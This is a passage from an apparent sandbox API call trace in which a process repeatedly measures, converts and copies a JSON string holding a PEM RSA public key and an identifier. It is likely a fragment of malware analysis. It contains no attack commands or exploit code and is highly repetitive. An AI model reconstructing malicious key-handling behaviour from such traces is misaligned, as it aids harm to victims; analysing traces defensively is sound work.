KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x220) returned 0x3189ad8 [0074.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc3c) returned 0x31d40e8 [0074.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3189ad8, cbMultiByte=-1, lpWideCharStr=0x31d40e8, cchWideChar=1566 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 543 [0074.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc40) returned 0x31d4d30 [0074.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d40e8 | out: hHeap=0x680000) returned 1 [0074.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189ad8 | out: hHeap=0x680000) returned 1 [0074.155] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4d30 | out: hHeap=0x680000) returned 1 [0074.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x43e) returned 0x316ccb8 [0074.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbca778, cbMultiByte=-1, lpWideCharStr=0x316ccb8, cchWideChar=543 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 543 [0074.155] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.155] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0074.155] lstrlenA (lpString="\",\"id\":\"") returned 8 [0074.155] lstrcpyA (in: lpString1=0xfbcab78, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" 